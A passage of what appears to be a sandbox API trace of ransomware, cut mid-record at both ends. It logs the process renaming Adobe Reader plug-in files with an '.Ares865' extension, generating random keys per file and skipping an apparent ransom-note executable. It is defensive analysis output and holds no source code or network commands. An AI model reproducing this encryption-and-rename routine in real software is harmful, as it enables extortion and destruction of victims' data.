szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.324] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.324] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.325] lstrcpyW (in: lpString1=0x2cce490, lpString2="QuickTime.JPN" | out: lpString1="QuickTime.JPN") returned="QuickTime.JPN" [0173.325] lstrlenW (lpString="QuickTime.JPN") returned 13 [0173.325] lstrlenW (lpString="Ares865") returned 7 [0173.325] lstrcmpiW (lpString1="ime.JPN", lpString2="Ares865") returned 1 [0173.325] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.JPN.Ares865") returned 93 [0173.325] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.JPN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.jpn"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.JPN.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.jpn.ares865"), dwFlags=0x1) returned 1 [0173.327] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.JPN.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.jpn.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.328] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0173.328] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.328] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.329] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.331] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.331] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.331] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.332] lstrcpyW (in: lpString1=0x2cce490, lpString2="QuickTime.KOR" | out: lpString1="QuickTime.KOR") returned="QuickTime.KOR" [0173.332] lstrlenW (lpString="QuickTime.KOR") returned 13 [0173.332] lstrlenW (lpString="Ares865") returned 7 [0173.332] lstrcmpiW (lpString1="ime.KOR", lpString2="Ares865") returned 1 [0173.332] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.KOR.Ares865") returned 93 [0173.332] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.KOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.kor"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.KOR.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.kor.ares865"), dwFlags=0x1) returned 1 [0173.334] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.KOR.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.kor.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.334] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0173.335] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.335] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.335] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.338] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.338] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.338] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.339] lstrcpyW (in: lpString1=0x2cce490, lpString2="QuickTime.mpp" | out: lpString1="QuickTime.mpp") returned="QuickTime.mpp" [0173.339] lstrlenW (lpString="QuickTime.mpp") returned 13 [0173.339] lstrlenW (lpString="Ares865") returned 7 [0173.339] lstrcmpiW (lpString1="ime.mpp", lpString2="Ares865") returned 1 [0173.339] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.mpp.Ares865") returned 93 [0173.339] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.mpp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.mpp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.mpp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.mpp.ares865"), dwFlags=0x1) returned 1 [0173.352] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.mpp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.mpp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.352] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=278528) returned 1 [0173.353] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.353] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.353] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.369] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.370] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.370] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.374] lstrcpyW (in: lpString1=0x2cce490, lpString2="QuickTime.NLD" | out: lpString1="QuickTime.NLD") returned="QuickTime.NLD" [0173.374] lstrlenW (lpString="QuickTime.NLD") returned 13 [0173.374] lstrlenW (lpString="Ares865") returned 7 [0173.374] lstrcmpiW (lpString1="ime.NLD", lpString2="Ares865") returned 1 [0173.375] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.NLD.Ares865") returned 93 [0173.375] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.NLD" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.nld"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.NLD.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.nld.ares865"), dwFlags=0x1) returned 1 [0173.377] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.NLD.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.nld.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.377] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0173.377] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.378] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.378] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.380] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.381] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.381] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.382] lstrcpyW (in: lpString1=0x2cce490, lpString2="QuickTime.NOR" | out: lpString1="QuickTime.NOR") returned="QuickTime.NOR" [0173.382] lstrlenW (lpString="QuickTime.NOR") returned 13 [0173.382] lstrlenW (lpString="Ares865") returned 7 [0173.382] lstrcmpiW (lpString1="ime.NOR", lpString2="Ares865") returned 1 [0173.382] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.NOR.Ares865") returned 93 [0173.382] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.NOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.nor"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.NOR.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.nor.ares865"), dwFlags=0x1) returned 1 [0173.384] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.NOR.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.nor.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.384] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0173.384] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.385] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.385] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.387] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.388] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.388] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.389] lstrcpyW (in: lpString1=0x2cce490, lpString2="QuickTime.PTB" | out: lpString1="QuickTime.PTB") returned="QuickTime.PTB" [0173.389] lstrlenW (lpString="QuickTime.PTB") returned 13 [0173.389] lstrlenW (lpString="Ares865") returned 7 [0173.389] lstrcmpiW (lpString1="ime.PTB", lpString2="Ares865") returned 1 [0173.389] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.PTB.Ares865") returned 93 [0173.389] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.PTB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.ptb"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.PTB.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.ptb.ares865"), dwFlags=0x1) returned 1 [0173.391] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.PTB.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.ptb.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.391] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0173.391] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.392] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.392] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.394] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.395] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.395] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.396] lstrcpyW (in: lpString1=0x2cce490, lpString2="QuickTime.SUO" | out: lpString1="QuickTime.SUO") returned="QuickTime.SUO" [0173.396] lstrlenW (lpString="QuickTime.SUO") returned 13 [0173.396] lstrlenW (lpString="Ares865") returned 7 [0173.396] lstrcmpiW (lpString1="ime.SUO", lpString2="Ares865") returned 1 [0173.396] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.SUO.Ares865") returned 93 [0173.396] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.SUO" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.suo"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.SUO.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.suo.ares865"), dwFlags=0x1) returned 1 [0173.398] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.SUO.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.suo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.398] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0173.398] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.399] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.399] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.401] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.402] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.402] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.402] lstrcpyW (in: lpString1=0x2cce490, lpString2="QuickTime.SVE" | out: lpString1="QuickTime.SVE") returned="QuickTime.SVE" [0173.402] lstrlenW (lpString="QuickTime.SVE") returned 13 [0173.403] lstrlenW (lpString="Ares865") returned 7 [0173.403] lstrcmpiW (lpString1="ime.SVE", lpString2="Ares865") returned 1 [0173.403] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.SVE.Ares865") returned 93 [0173.403] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.SVE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.sve"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.SVE.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.sve.ares865"), dwFlags=0x1) returned 1 [0173.405] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.SVE.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.sve.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.405] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0173.405] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.406] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.406] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.409] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.409] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.409] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.410] lstrcpyW (in: lpString1=0x2cce490, lpString2="WindowsMedia.CAT.Ares865" | out: lpString1="WindowsMedia.CAT.Ares865") returned="WindowsMedia.CAT.Ares865" [0173.410] lstrlenW (lpString="WindowsMedia.CAT.Ares865") returned 24 [0173.410] lstrlenW (lpString="Ares865") returned 7 [0173.410] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0173.410] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d6d7160, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WindowsMedia.CHS", cAlternateFileName="WINDOW~1.CHS")) returned 1 [0173.410] lstrcmpiW (lpString1="WindowsMedia.CHS", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0173.410] lstrcmpiW (lpString1="WindowsMedia.CHS", lpString2="aoldtz.exe") returned 1 [0173.410] lstrcpyW (in: lpString1=0x2cce490, lpString2="WindowsMedia.CHS" | out: lpString1="WindowsMedia.CHS") returned="WindowsMedia.CHS" [0173.410] lstrlenW (lpString="WindowsMedia.CHS") returned 16 [0173.410] lstrlenW (lpString="Ares865") returned 7 [0173.411] lstrcmpiW (lpString1="dia.CHS", lpString2="Ares865") returned 1 [0173.411] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.CHS.Ares865") returned 96 [0173.411] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.CHS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.chs"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.CHS.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.chs.ares865"), dwFlags=0x1) returned 1 [0173.413] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.CHS.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.chs.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.413] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0173.413] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.414] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.414] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.416] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.417] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.417] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.417] lstrcpyW (in: lpString1=0x2cce490, lpString2="WindowsMedia.CHT" | out: lpString1="WindowsMedia.CHT") returned="WindowsMedia.CHT" [0173.417] lstrlenW (lpString="WindowsMedia.CHT") returned 16 [0173.417] lstrlenW (lpString="Ares865") returned 7 [0173.417] lstrcmpiW (lpString1="dia.CHT", lpString2="Ares865") returned 1 [0173.418] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.CHT.Ares865") returned 96 [0173.418] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.CHT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.cht"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.CHT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.cht.ares865"), dwFlags=0x1) returned 1 [0173.419] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.CHT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.cht.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.420] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0173.420] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.421] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.421] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.423] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.423] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.423] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.424] lstrcpyW (in: lpString1=0x2cce490, lpString2="WindowsMedia.DAN" | out: lpString1="WindowsMedia.DAN") returned="WindowsMedia.DAN" [0173.424] lstrlenW (lpString="WindowsMedia.DAN") returned 16 [0173.424] lstrlenW (lpString="Ares865") returned 7 [0173.424] lstrcmpiW (lpString1="dia.DAN", lpString2="Ares865") returned 1 [0173.424] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.DAN.Ares865") returned 96 [0173.424] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.dan"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.DAN.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.dan.ares865"), dwFlags=0x1) returned 1 [0173.426] CreateFileW (lpFileName="C:\\Program Files 